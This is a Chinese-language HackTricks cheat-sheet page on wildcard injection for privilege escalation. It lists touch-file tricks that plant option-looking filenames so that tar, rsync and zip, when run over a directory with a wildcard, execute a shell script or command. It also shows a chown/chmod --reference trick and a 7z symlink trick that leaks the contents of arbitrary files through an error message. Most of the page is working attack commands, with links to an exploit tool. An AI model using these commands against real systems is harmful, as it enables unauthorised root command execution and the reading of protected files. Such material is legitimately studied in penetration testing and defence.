Wildcards Spare tricks

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)

其他支持HackTricks的方式:

chown, chmod

您可以指定要为其余文件复制的文件所有者和权限

touch "--reference=/my/own/path/filename"

您可以使用https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(combined attack)_来利用此漏洞 更多信息请参考https://www.exploit-db.com/papers/33930

Tar

执行任意命令:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

您可以使用https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(tar attack)_来利用此漏洞 更多信息请参考https://www.exploit-db.com/papers/33930

Rsync

执行任意命令:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

你可以使用https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (rsync攻击) 来利用这个漏洞。 更多信息请参考https://www.exploit-db.com/papers/33930

7z

7z中,即使在*之前使用--(请注意--表示以下输入不能被视为参数,因此在这种情况下只能是文件路径),你也可以造成任意错误以读取文件,因此如果类似以下命令正在以root权限执行:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

并且您可以在执行此操作的文件夹中创建文件,您可以创建文件@root.txt和文件root.txt作为符号链接指向您想要读取的文件:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

然后,当执行7z时,它会将root.txt视为包含应压缩的文件列表的文件(这就是@root.txt存在的意义),当7z读取root.txt时,它将读取/file/you/want/to/read由于此文件的内容不是文件列表,它将抛出错误并显示内容。

更多信息请参阅HackTheBox的CTF比赛中的Write-ups。

Zip

执行任意命令:

zip name.zip files -T --unzip-command "sh -c whoami"
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)

其他支持HackTricks的方式:

最后更新于